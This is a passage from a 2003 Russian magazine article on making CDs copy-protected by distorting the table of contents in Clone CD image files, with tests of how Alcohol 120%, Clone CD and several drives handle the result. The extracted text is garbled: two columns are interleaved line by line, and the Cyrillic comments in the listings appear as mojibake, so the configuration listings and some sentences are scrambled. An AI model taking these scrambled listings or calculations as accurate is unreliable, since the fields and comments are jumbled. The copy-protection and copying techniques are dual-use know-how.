AFrame=0 ; / ; âîçìîæíîé Lead-out-îáëàñòè
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà PFrame=34 ; / (íà ñàìîì äèñêå íàïèñàíî 23 ìèí.,
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ, ; ýòî æ êàê íàäî îêðóãëÿòü 22:14:34)
; êàê îíî è åñòü PLBA=99934 ; LBA-àäðåñ ïîñëåäíåé âîçìîæíîé
PMin=2 ; íîìåð ïåðâîãî òðåêà ñåññèè 2 ; Lead-out-îáëàñòè
; (íóìåðàöèÿ òðåêîâ ñêâîçíàÿ!) [TRACK 1] ; äàííûå òðåêà 1
PSec=0 ; òèï äèñêà CD-DA è CD-ROM-äèñê â Mode 1 MODE=1 ; ðåæèì Mode 1
PFrame=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè INDEX 1=0 ; post-gap?
PLBA=8850 ; íîìåð òðåêà, ïðåäñòàâëåííûé Clone CD
; êàê LBA-àäðåñ, ò.å. ãëóïîñòü [TRACK 2] ; äàííûå òðåêà 2
[Entry 8] ; äàííûå ýëåìåíòà TOC ¹8 MODE=1 ; ðåæèì Mode 1
Session=2 ; ýëåìåíò ñåññèè 2 INDEX 1=0 ; post-gap?
Point=0xa1 ; íîìåð ïîñëåäíåãî òðåêà ñåññèè 2 â PMin
ADR=0x01 ; q-Mode == 1 Давайте теперь немного поиздеваемся над TOC и уве-
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
; äëÿ êîïèðîâàíèÿ личим стартовый адрес первого трека так, чтобы он вы-
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – шел далеко за пределы первой сессии и попал… ну, соб-
; ýòî Lead-in-òðåê (ò.å. TOC)
AMin=0 ; \ ственно, куда нибудь он все равно попадет. Чтобы быстро
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà отыскать соответствующую ему запись, воспользуемся
AFrame=0 ; /
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà контекстным поиском. Жмем <F7> и вводим «point=0x1»:
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
; êàê îíî è åñòü Ëèñòèíã 2. Àòðèáóòû òðåêà 1.
PMin=2 ; íîìåð ïîñëåäíåãî òðåêà ñåññèè 2
; (â ñåññèè òîëüêî îäèí òðåê) [Entry 3] ; äàííûå ýëåìåíòà TOC ¹3
PSec=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè Session=1 ; ýëåìåíò ñåññèè 1
PFrame=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè Point=0x01 ; äàííûå òðåêà 1 ñåññèè 1
PLBA=8850 ; íîìåð òðåêà, ïðåäñòàâëåííûé Clone CD ADR=0x01 ; q-Mode == 1
; êàê LBA-àäðåñ, ò.å. ãëóïîñòü Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
[Entry 9] ; äàííûå ýëåìåíòà TOC ¹9 ; äëÿ êîïèðîâàíèÿ
Session=2 ; ýëåìåíò ñåññèè 2 TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
Point=0xa2 ; ïîëîæåíèå Lead-out-îáëàñòè ; ýòî Lead-in-òðåê (ò.å. TOC)
; â PMin:PSec:PFrame AMin=0 ; \
ADR=0x01 ; q-Mode == 1 ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé AFrame=0 ; /
; äëÿ êîïèðîâàíèÿ ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
; ýòî Lead-in-òðåê (ò.å. TOC) ; êàê îíî è åñòü
AMin=0 ; \ PMin=0 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà PSec=2 ; + - àáñîëþòíûé àäðåñ íà÷àëà òðåêà 1
AFrame=0 ; / ; ñåññèè 1
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà PFrame=0 ; /
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ, PLBA=0 ; LBA-àäðåñ íà÷àëà òðåêà 1 ñåññèè 1
; êàê îíî è åñòü
PMin=3 ; \
PSec=24 ; + - àáñîëþòíûé àäðåñ Lead-out-îáëàñòè Как мы видим, здесь присутствует как абсолютный,
; ñåññèè 2
PFrame=23 ; / измеряемый в минутах, секундах, фреймах, так и LBA-ад-
PLBA=15173 ; LBA-àäðåñ Lead-out-îáëàñòè ñåññèè 2 рес трека, представляющий собой не что иное, как по-
[Entry 10] ; äàííûå ýëåìåíòà TOC ¹10 рядковый номер сектора, считая от нуля. На самом деле,
Session=2 ; ýëåìåíò ñåññèè 2 LBA-адрес – это «отсебятина», добавляемая в файл са-
Point=0x02 ; äàííûå òðåêà 2 ñåññèè 2
ADR=0x01 ; q-Mode == 1 мим Clone CD, и в TOC LBA-адрес не хранится. Судя по
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé всему, Clone CD вычисляет LBA-адрес исходя из сообра-
; äëÿ êîïèðîâàíèÿ
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – жений удобства (работать с LBA-адресацией действитель-
; ýòî Lead-in-òðåê (ò.å. TOC) но намного комфортнее). Однако при внесении каких-либо
AMin=0 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà изменений в CCD-файл за согласованием обоих типов
AFrame=0 ; / адресов нам придется следить самостоятельно. Для пе-
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ, ревода абсолютных адресов в LBA можно воспользовать-
; êàê îíî è åñòü ся следующей формулой:

№9(10), сентябрь 2003 37

 администрирование
Logical Sector Address=(((Minute∗60)+Seconds)∗75+Frame)–150 Шаг пятый
В порядке эксперимента попробуем «прожечь» искажен-
Ниже представлен вид атрибутов трека 1 до и после ный образ в режиме RAW SAO, в котором, как уже было
искажения: сказано выше, корректная запись сессий с искаженным
TOC невозможна. Для гарантированного исключения воз-
Ëèñòèíã 3. Àòðèáóòû òðåêà 1 äî èñêàæåíèé (ñëåâà) è ïîñëå можных побочных эффектов желательно использовать при-
èñêàæåíèÿ (ñïðàâà).
вод, не поддерживающий RAW DAO чисто физически (ну
[Entry 3] [Entry 3] мало ли, вдруг копировщик в плане проявления чудес ис-
Session=1 Session=1
Point=0x01 Point=0x01 кусственного интеллекта автоматически перейдет на более
ADR=0x01 ADR=0x01 подходящий режим записи, игнорируя наши установки).
Control=0x04 Control=0x04
TrackNo=0 TrackNo=0 Мастер записи образов копировщика Alcohol 120% вы-
AMin=0 AMin=0 дает следующую информацию о записываемом образе:
ASec=0 ASec=0
AFrame=0 AFrame=0
ALBA=-150 ALBA=-150 Ëèñòèíã 4. Ñâîäíàÿ èíôîðìàöèÿ ïî çàïèñûâàåìîìó îáðàçó, âû-
Zero=0 Zero=0 äàâàåìàÿ Alcohol. Îáðàòèòå âíèìàíèå íà ðàçìåðû è àäðåñ ïåð-
PMin=0 --> PMin=10 âîãî òðåêà ïåðâîé ñåññèè (îíè âûäåëåíû äðóãèì öâåòîì).
PSec=2 --> PSec=2
PFrame=0 --> PFrame=0 Òèï: Ôàéë-îáðàç Clone CD
PLBA=0 --> PLBA=-1 Ïóòü: L:\
Èìÿ: Image.ccd
Image.img
На самом деле, коварный автор схитрил и вместо вы- Image.sub
числений LBA-адреса сослался на тот факт, что его вер- Ðàçìåð: 8.81 MB
Ñåññèé: 2
сия Clone CD всегда использует абсолютные адреса, а LBA Òðåêîâ: 2
игнорирует.
Ñåññèÿ 01:
Выбор абсолютного адреса первого трека произволь- Òðåê 01: Mode 1, Äëèíà: -42942(8191.92 GB), Àäðåñ: 045000
ный, но осуществленный с таким расчетом, чтобы иска- Ñåññèÿ 02:
Òðåê 02: Mode 1, Äëèíà: 001715(3.3 MB), Àäðåñ: 013458
женный адрес гарантированно вылетал за границы пер-
вой сессии, Lead-out-область которой находится по адре- Вот это номер! Если верить Alcohol, то длина первого
су 00:29:33 (см. элемент TOC №2). трека составляет целых 8 Тб. Этот чудовищный объем не
то что на CD на DVD-диск не влезет! На самом деле, дли-
Шаг четвертый на треков в TOC нигде явным образом не хранится, но
Теперь смонтируем искаженный образ диска на вирту- вычисляется как разница стартовых адресов двух смеж-
альный привод, создаваемый программой Alcohol 120%, ных треков (если же сессия содержит всего один трек, в
и посмотрим, что из этого получилось. Конечно, нет ни- ход идет адрес Lead-out-области, примыкающий к треку).
какой уверенности в том, что виртуальный привод по- Искажение стартового адреса первого трека привело к
ведет себя как настоящий, но ведь и настоящие приво- тому, что разница стартовых адресов Lead-out-области и
ды на искаженных дисках ведут себя по-разному! По- этого самого трека стала отрицательной. Действительно,
этому использовать Alcohol в качестве рабочего «ма- 00:29:33 – 10:02:00 = 2058 – 45000 = – 42942, а если вспом-
кетника» вполне допустимо, тем более что это эконо- нить, что LBA-адреса по стандарту выражаются 32-раз-
мит уйму времени и болванок, ведь монтирование вир- рядными неотрицательными числами, становится понят-
туального диска в отличие от «прожига» болванки осу- но, как Alcohol получил такой неестественно огромный
ществляется мгновенно, если, конечно, оно вообще осу- объем (отрицательные числа – это такие числа, чей стар-
ществляется… Вплоть до версии 1.4.3 включительно – ший бит взведен, отсюда – маленькое отрицательное чис-
самой свежей версии на момент написания этих строк – ло – это очень большое положительное). Расчеты пока-
Alcohol органически не переваривал искаженные обра- зывают, что заявленное Alcohol значение в 8 Тб достига-
зы дисков и отказывался их монтировать, апеллируя к ется лишь при использовании 43-битных переменных. Вот
недоступности образа файла: «Unable to mount image. это да! Alcohol спроектирован с запасом на будущее (а в
File not accessible». Судя по всему, Alcohol понимает будущем нас, как известно, ждут диски с объемами от 30
искаженный TOC слишком буквально, пытаясь отыскать и более гигабайт, для адресации которых 32 бит оказы-
в файле-образе то, чего там заведомо нет (трека, на- вается уже недостаточно, плюс еще необходимо учесть
чинающегося с адреса 10:02:00 и заканчивающегося ад- резерв, предназначенный для «отлова» отрицательных
ресом 00:29:33 там нет точно!). длин, образовавшихся в результате жестоких извраще-
Какая жалость! Возможность монтирования дисковых ний с TOC, ведь Alcohol – это защищенный копировщик!)
образов с искаженным TOC позволила бы нам преодоле- И вот наступает волнующий момент – момент заливки
вать защиту от копирования на любых пишущих приво- искаженного образа на CD-R/CD-RW-диск (внимание! ис-
дах, а не только на тех, что поддерживают режим RAW пользуя CD-RW-диск, вы должны отдавать себе отчет в том,
DAO, – просто сбрасываем образ защищенного диска на что можете его безвозвратно потерять! Если ваш единствен-
болванку в виде обыкновенного файла и динамически ный пишущий привод откажется опознавать такой диск, очи-
монтируем его Alcohol по мере необходимости. Выходит, стка последнего окажется невозможной!). Благополучно
что на проверку Alcohol оказывается гораздо менее крут, проглотив искаженный образ, Alcohol, безо всяких препи-
чем это кажется! рательств со своей стороны зажигает огонек индикации за-

38

писи (если, конечно, на вашем приводе он есть) и приступа-
ет к делу. Проходит минута, другая… а индикатор прогрес-
са по-прежнему остается на нуле. К исходу шестой минуты,
когда пишущая головка достигает кромки диска, процесс
записи аварийно прерывается приводом и Alcohol, издав
грустное «бэмс», сигнализирует об аппаратной ошибке.
Просмотр «недорезанного» диска на приводах ASUS
и NEC обнаруживает лишь первую сессию, а от второй не
видно и следа. С приводом PHILIPS дела обстоят еще
хуже – он вообще отказывается признавать засунутую в
него штуку лазерным диском, и после непродолжитель-
ного скрежета своих механических внутренностей, сопро-
вождаемых натужными завываниями перебирающего раз-
личные скорости мотора, индикатор «DISC IN» прощаль-
но гаснет. «Прощально» в том смысле, что с испорчен-
ной болванкой вам придется расстаться. Конечно, если
это всего лишь дешевый CD-R, то туда ему и дорога, но
потерять CD-RW жалко. К счастью, на NEC очистка диска
протекает успешно, и, воодушевленные этим обстоятель-
ством, мы продолжаем свои издевательства вновь.
Копировщик Clone CD ведет себя в этом отношении
иначе. Во-первых, он оценивает длину искаженного тре-
ка в 4 294 868 664 Кб (см. листинг, приведенный ниже),
что указывает на использование 32-разрядных перемен-
ных и вытекающую отсюда невозможность отличать по-
ложительные длины от отрицательных.
Ëèñòèíã 5. Ñâîäíàÿ èíôîðìàöèÿ ïî çàïèñûâàåìîìó îáðàçó, âû-
äàâàåìàÿ Clone CD. Îáðàòèòå âíèìàíèå íà ðàçìåð ïåðâîãî òðå-
êà ïåðâîé ñåññèè (îí âûäåëåí äðóãèì öâåòîì).
ÈÍÔÎÐÌÀÖÈß Î ÔÀÉËÅ-ÎÁÐÀÇÅ:
×èñëî ñåññèé: 2
Çàíÿòî íà äèñêå: 34850 Êáàéò
Ñåêòîðîâ: 15173
Âðåìÿ: 03:22:23 (ìèí:ñåê:êàäð)
ÈÍÔÎÐÌÀÖÈß Î ÑÅÑÑÈÈ 1:
Ðàçìåð ñåññèè: 4726 Êáàéò
×èñëî òðåêîâ: 1
Pregap: Äàííûå Mode 1, ðàçìåð: 103359 Êáàéò
Track 1: Äàííûå Mode 1, ðàçìåð: 4294868664 Êáàéò
ÈÍÔÎÐÌÀÖÈß Î ÑÅÑÑÈÈ 2:
Ðàçìåð ñåññèè: 3939 Êáàéò
×èñëî òðåêîâ: 1
Track 2: Äàííûå Mode 1, ðàçìåð: 3939 Êáàéò
Во-вторых, обнаружив, что запись искаженного TOC
на данном приводе невозможна, Clone CD корректирует
TOC так, чтобы его облик принял человеческий вид. В
результате процесс «прожига» протекает без каких-либо
ошибок и мы получаем как будто бы работоспособный
диск. Стартовый адрес первого трека начинается там, где
кончается Lead-in-область первой сессии (точнее, pre-gap
первого трека начинается там, где кончается post-gap
Lead-in-области первой сессии, но это уже детали). Такой
диск нормально читается в любом приводе CD-ROM, но!
Если защитный механизм прочитает содержимое TOC, он
легко обнаружит, что имеет дело с копией, но не с ориги-
налом. Спрашивается: и на кой черт нам такое копирова-
ние нужно?! Хоть бы предупреждение было какое… Лад-
но, профессионалы запросто определят, в чем подвох, но
в каком положении окажутся новички, и/или просто ква-
№9(10), сентябрь 2003
администрирование
лифицированные пользователи, использующие Clone CD
для своих нужд? В общем мрак, одним словом…
Правда, в режиме RAW DAO нарезка искаженного обра-
за протекает отлично и Clone CD не вносит в TOC никакой
отсебятины, благодаря чему у нас образуется действитель-
но защищенный CD, который мы сейчас и будем ломать.
Шаг шестой
Просмотр защищенного диска под приводом NEC показы-
вает все файлы, даже те, что принадлежат первому тре-
ку – тому самому треку, чей стартовый адрес жестоко ис-
кажен. Двойной щелчок мышью доказывает, что файлы
не только присутствуют в каталоге, но и успешно открыва-
ются ассоциированным с ними приложениям и, судя по
всему, выглядят вполне нормальными. Нашу душу начина-
ют грызть смутные сомнения: действительно ли пишущий
привод записал стартовый адрес первого трека таким, ка-
ким мы просили, или молчаливо исправил его на лету?
Для ответа на этот вопрос мы должны исследовать гео-
метрию диска, т.е., попросту говоря, прочитать TOC. Запус-
каем уже полюбившийся нам Roxio Easy CD Creator и в меню
«CD» находим пункт «CD Information». Щелкаем по нему
мышкой, и на экран тут же выпрыгивает диалоговое окно с
раскладкой диска (внимание! не все программы способны
«переваривать» искаженный TOC! Easy CD Creator это уме-
ет, а вот, например, Record NOW! – нет. В отсутствии подхо-
дящей утилиты вы можете воспользоваться программой
raw.TOC.exe, поставляемой вместе с этой книгой).
Как и следовало ожидать, стартовый адрес первого
трека лежит далеко за пределами своей «родной» сес-
сии, и его длина, будучи выраженная положительным чис-
лом, значительно превышает доступную емкость диска
(см. рис. ниже). Так что все наши волнения абсолютно бе-
зосновательны!
Ðèñóíîê 1. Îòðèöàòåëüíàÿ äëèíà ïåðâîãî òðåêà ñâîäèò øòàòíûé
êîïèðîâùèê ñ óìà
Постойте, но как же тогда осуществляется доступ к со-
держимому первого трека? А кто вам вообще сказал, что
лазерный диск адресуется по трекам?! Основной адреса-
цией лазерного диска с данными является сектор. Абсо-
лютный же адрес всякого сектора однозначно определяет-
ся принадлежащим ему Q-каналом подкода (с учетом не-
39
 администрирование
совпадения границ секций и секторов максимально воз- Еще до завершения процесса копирования нас начи-
можное расхождение, допускаемое стандартом, составля- нают одолевать стойкие сомнения или, я бы даже сказал,
ет 1 сек, т.е. 75 секторов, поэтому этот способ использует- непоколебимая уверенность в том, что диск будет скопи-
ся лишь для грубого позиционирования оптической голов- рован неправильно. И действительно, чего мы опасались,
ки). Точная наводка на цель выполняется непосредствен- то мы и получили! Давайте создадим образ скопирован-
но по самому секторному заголовку, в явном виде содер- ного диска в плане сравнения копии TOC с оригиналом.
жащему его абсолютный адрес. Номера треков в процессе
обработки сектора вообще не участвуют, вернее могут и Ëèñòèíã 7. Îáðàç çàùèùåííîãî äèñêà, ñíÿòûé ïðîãðàììîé
Clone CD (íåñîîòâåòñòâóþùèå ïîëÿ âûäåëåíû äðóãèì öâåòîì).
не участвовать… Но могут ведь и участвовать! Все зави-
сит от электронной начинки привода и его микропрограмм- [CloneCD] ; äàííûå î êîïèðîâùèêå
Version=3 ; âåðñèÿ Clone CD
ной прошивки. Как именно они в этом участвуют – сие есть
великая тайна разработчиков привода, и простым смерт- [Disc] ; äàííûå î äèñêå
TocEntries=7 ; êîëè÷åñòâî ýëåìåíòîâ TOC = 7
ным ее понять не дано. Но так или иначе, встретив некор- ; (â îðèãèíàëå áûëî 12)
ректный TOC, некоторые приводы запутываются, и в строй- Sessions=1 ; êîë-âî ñåññèé = 1
; (â îðèãèíàëå áûëî 2)
ных битовых рядах возникает настоящая сумятица. DataTracksScrambled=0 ; ïîëå DVD
Результаты тестирования трех моих приводов следую- CDTextLength=0 ; CD-Text â ïîëÿõ ïîäêîäà
; Lead-in-îáëàñòè îòñóòñòâóåò
щие: NEC, как уже говорилось выше, показывает содер- [Session 1] ; äàííûå ñåññèè 1
жимое обоих секций, корректно обрабатывая их содержи- PreGapMode=1 ; òèï òðåêà == Mode 1
PreGapSubC=0 ; äàííûõ ïîäêàíàëà – íåò
мое. ASUS показывает только первую – искаженную – сес-
сию и в упор не видит вторую, делая ее недоступной даже [Entry 0] ; äàííûå ýëåìåíòà TOC ¹0
Session=1 ; ýëåìåíò ñåññèè 1
на секторном уровне. Зато файлы первой сессии обраба- Point=0xa0 ; íîìåð ïåðâîãî òðåêà ñåññèè 1
тываются вполне корректно. PHILIPS, напротив, видит обе ; â PMin/òèï äèñêà â PSec
ADR=0x01 ; q-Mode == 1
сессии, но корректно обрабатывает файлы лишь последней Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
из них (т.е. той, что не искажена). Искаженная сессия дос- ; äëÿ êîïèðîâàíèÿ
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
тупна на секторном уровне, но нестабильно. Иногда без ; ýòî Lead-in-òðåê (ò.å. TOC)
всяких видимых причин PHILIPS и возвращает лишенный AMin=0 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà
всякого смысла мусор. AFrame=0 ; /
Мораль: защитные механизмы, базирующиеся на ис- ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
каженном TOC, не могут закладываться ни на одну из сес- ; êàê îíî è åñòü
сий. Поэтому обе сессии должны дублировать содержи- PMin=1 ; íîìåð ïåðâîãî òðåêà ñåññèè 1
PSec=0 ; òèï äèñêà CD-DA è CD-ROM-äèñê â Mode 1
мое друг друга – авось хоть одну из них привод пользова- PFrame=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè
теля да прочтет. Какой же тогда в этой защите смысл? А PLBA=4350 ; íîìåð òðåêà, ïðåäñòàâëåííûé Clone CD
; êàê LBA-àäðåñ, ò.å. ãëóïîñòü
вот какой – пускай защита не может без риска для жизни [Entry 1] ; äàííûå ýëåìåíòà TOC ¹1
привязаться к сессиям, она может привязаться к сырому Session=1 ; ýëåìåíò ñåññèè 1
Point=0xa1 ; íîìåð ïîñëåäíåãî òðåêà ñåññèè 1 â PMin
содержимому TOC. О том, как осуществить такую при- ADR=0x01 ; q-Mode == 1
вязку на практике, мы поговорим чуточку позднее, а пока Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
; äëÿ êîïèðîâàíèÿ
попробуем скопировать защищенный диск нашими фа- TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
воритами – Clone CD и Alcohol 120%. ; ýòî Lead-in-òðåê (ò.å. TOC)
AMin=0 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà
Автоматическое копирование AFrame=0
ALBA=-150
;
;
/
LBA-àäðåñ òåêóùåãî òðåêà
и обсуждение его результатов Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
В какой бы привод защищенный диск ни был вставлен, Clone ; êàê îíî è åñòü
PMin=1 ; íîìåð ïîñëåäíåãî òðåêà ñåññèè 1
CD выдает неизменно постоянный результат, не имеющий ; (â ñåññèè òîëüêî îäèí òðåê)
ничего общего с реальной действительностью. По его скром- PSec=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè
PFrame=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè
ному мнению, диск содержит всего одну сессию с общей PLBA=4350 ; íîìåð òðåêà, ïðåäñòàâëåííûé Clone CD
протяженностью в 4,6 Мб, но зато размер единственного ; êàê LBA-àäðåñ, ò.å. ãëóïîñòü
[Entry 2] ; äàííûå ýëåìåíòà TOC ¹2
трека последней составляет ни много ни мало – 3,9 Тб! Session=1 ; ýëåìåíò ñåññèè 1
Point=0xa2 ; ïîëîæåíèå Lead-out-îáëàñòè
; â PMin:PSec:PFrame
Ëèñòèíã 6. Òàêèì âèäèò çàùèùåííûé äèñê êîïèðîâùèê Clone CD. ADR=0x01 ; q-Mode == 1
Îáðàòèòå âíèìàíèå, ÷òî îí ðàñïîçíàë ëèøü îäíó ñåññèþ èç äâóõ Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
(ïåðâóþ), äà è òî íåïðàâèëüíî. ; äëÿ êîïèðîâàíèÿ
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
ÈÍÔÎÐÌÀÖÈß Î CD Â ÄÈÑÊÎÂÎÄÅ: ; ýòî Lead-in-òðåê (ò.å. TOC)
×èñëî ñåññèé: 1 AMin=0 ; \
Çàíÿòî íà äèñêå: 4726 Êáàéò ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà
Ñåêòîðîâ: 2058 AFrame=0 ; /
Âðåìÿ: 00:27:33 (ìèí:ñåê:êàäð) ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
ÈÍÔÎÐÌÀÖÈß Î ÑÅÑÑÈÈ 1: ; êàê îíî è åñòü
PMin=0 ; \
Ðàçìåð ñåññèè: 4726 Êáàéò PSec=29 ; + - àáñîëþòíûé àäðåñ Lead-out-îáëàñòè
×èñëî òðåêîâ: 1 ; ñåññèè 1
Pregap: Äàííûå Mode 1, ðàçìåð: 103359 Êáàéò PFrame=33 ; /
Track 1: Data, ðàçìåð: 4294868664 Êáàéò PLBA=2058 ; LBA-àäðåñ Lead-out-îáëàñòè ñåññèè 1

40
 администрирование
[Entry 3] ; äàííûå ýëåìåíòà TOC ¹3 сохранились, оказались неожиданно измененными поля
Session=1 ; ýëåìåíò ñåññèè 1
Point=0x01 ; äàííûå òðåêà 1 ñåññèè 1 Application Code и ATIP (и это несмотря на то, что запись про-
ADR=0x01 ; q-Mode == 1 изводилась на ту же самую CD-RW-болванку, что и раньше,
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
; äëÿ êîïèðîâàíèÿ хотя ее «прожиг» осуществлялся различными приводами).
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – Как следствие: скопированный диск оказывается рабо-
; ýòî Lead-in-òðåê (ò.å. TOC)
AMin=0 ; \ тоспособен не на всех приводах (ASUS и NEC его прочита-
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà ют, а вот PHILIPS – нет), к тому же защите ничего не стоит
AFrame=0 ; /
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà прочитать текущий TOC и сравнить его с эталонным.
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ, Короче говоря, «факир был пьян, и фокус не удался».
; êàê îíî è åñòü
PMin=10 ; \ Что ж, попробуем обратиться за помощью к Alcohol– уж
PSec=2 ; + - àáñîëþòíûé àäðåñ íà÷àëà òðåêà 1 он-то должен наверняка с этим справиться. Действитель-
; ñåññèè 1
PFrame=0 ; / но, Alcohol видит обе сессии: как искаженную, так и неис-
PLBA=45000 ; LBA-àäðåñ íà÷àëà òðåêà 1 ñåññèè 1 каженную, однако по малопонятным причинам сохраняет
[Entry 4] ; äàííûå ýëåìåíòà TOC ¹4 в образ лишь вторую из них (Clone CD сохранял первую).
Session=1 ; ýëåìåíò ñåññèè 1 Ну что это за зоопарк, а? Содержимое TOC скопированно-
Point=0xb0 ; ïîçèöèÿ ñëåäóþùåé çàïèñûâàåìîé îáëàñòè
; â AMin:ASec:AFrame го диска можно даже и не сравнивать – там будет далеко
ADR=0x05 ; q-Mode == 1 не то, что защита собирается ожидать. И напрасно! Содер-
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
; äëÿ êîïèðîâàíèÿ жимое TOC, снятое Alcohol, практически полностью соот-
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – ветствует оригиналу. Единственно, в чем ошибся Alcohol, –
; ýòî Lead-in-òðåê (ò.å. TOC)
AMin=2 ; \ определил тип pre-gap обоих треков не как Mode 1, но как
ASec=59 ; + - àáñîëþòíûé àäðåñ ñëåäóþùåé Mode 2. Впрочем, в силу отсутствия в образе первой сес-
; çàïèñûâàåìîé îáëàñòè
AFrame=33 ; / сии полученная с его помощью копия диска все равно ока-
ALBA=13308 ; LBA-àäðåñ ñëåäóþùåé çàïèñûâàåìîé îáëàñòè зывается неработоспособной.
Zero=3 ; êîëè÷åñòâî pointer â Mode 5
PMin=22 ; \
PSec=14 ; + - àáñîëþòíûé àäðåñ ìàêñèìàëüíîé
; çàïèñûâàåìîé îáëàñòè
PFrame=34 ; /
PLBA=99934 ; LBA-àäðåñ ìàêñèìàëüíîé çàïèñûâàåìîé
; îáëàñòè
[Entry 5] ; äàííûå ýëåìåíòà TOC ¹5
Session=1 ; ýëåìåíò ñåññèè 1
Point=0xc0 ; ñòàðòîâûé àäðåñ Lead-in-îáëàñòè
; Hybrid-äèñêà (åñëè îí åñòü)
ADR=0x05 ; Mode 5 (Îðàíæåâàÿ êíèãà)
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
; äëÿ êîïèðîâàíèÿ
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
; ýòî Lead-in-òðåê (ò.å. TOC)
AMin=162 ; ðåêîìåíäóåìàÿ ìîùíîñòü ëàçåðà äëÿ
ASec=200 ; Application code (â îðèãèíàëå çäåñü
; áûëî 128)
AFrame=224 ; â îðèãèíàëå çäåñü áûëî 140
ALBA=294074 ; LBA-"àäðåñ" òðåõ ïðåäûäóùèõ ïîëåé
Zero=0 ; çàðåçåðâèðîâàíî
PMin=97 ; \
PSec=27 ; + - àáñîëþòíûé àäðåñ Lead-in-îáëàñòè
; Hybrid-äèñêà
PFrame=21 ; / (àäðåñ ëåæèò çà ïðåäåëàìè äèñêà,
; ò.å. Hybrid-äèñêà íåò) Ðèñóíîê 2. Alcohol âèäèò îáå ñåññèè çàùèùåííîãî äèñêà, íî…
PLBA=-11604 ; LBA-àäðåñ Lead-in-îáëàñòè Hybrid
; (âû÷èñëåí ñ ïåðåïîëíåíèåì)
[Entry 6] ; äàííûå ýëåìåíòà TOC ¹6
Session=1 ; ýëåìåíò ñåññèè 1
Point=0xc1 ; êîïèÿ ATIP-èíôîðìàöèè
ADR=0x05 ; -+
Control=0x04 ; -+
TrackNo=0 ; -+
AMin=4 ; -+
ASec=192 ; -+
AFrame=150 ; -+- ATIP (èçìåíåíà!)
ALBA=32400 ; -+
Zero=0 ; -+
PMin=0 ; -+
PSec=0 ; -+
PFrame=0 ; -+
PLBA=-150
[TRACK 1]
MODE=0
INDEX 1=45000

Сокращение сессий с двух до одной очень сильно сму-

щает. Куда девалась вторая – неискаженная(!) сессия, во-
Ðèñóíîê 3. Êîïèðóåò ëèøü âòîðóþ èç íèõ, à ïåðâóþ íàãëî
обще непонятно. И, хотя искаженные данные первого трека ïðîïóñêàåò

№9(10), сентябрь 2003 41

 администрирование
А ведь заявлялось, что Clone CD/Alcohol 120% способ-
ны копировать любые существующие на сегодняшний мо-
мент защищенные диски, и вдруг на поверку оказывается,
что даже такую простую защиту, которую может создать
на кончике пенька любой программист, они преодолеть ни
вместе, ни по раздельности не в состоянии! Причем аппа-
ратура, на которой все эти эксперименты и осуществля-
лись, возможность корректного копирования искаженного
диска гарантированно поддерживает (сам проверял), и
потому отмахнуться физическими ограничениями приво-
дов разработчикам обоих копировщиков уже не удастся!
Даже не верится, что такой простой прием «ослепля-
ет» лучших копировщиков защищенных дисков! Неужели
и вправду создание некопируемых дисков вполне осуще-
ствимо на обыкновенном бытовом оборудовании?! Да!
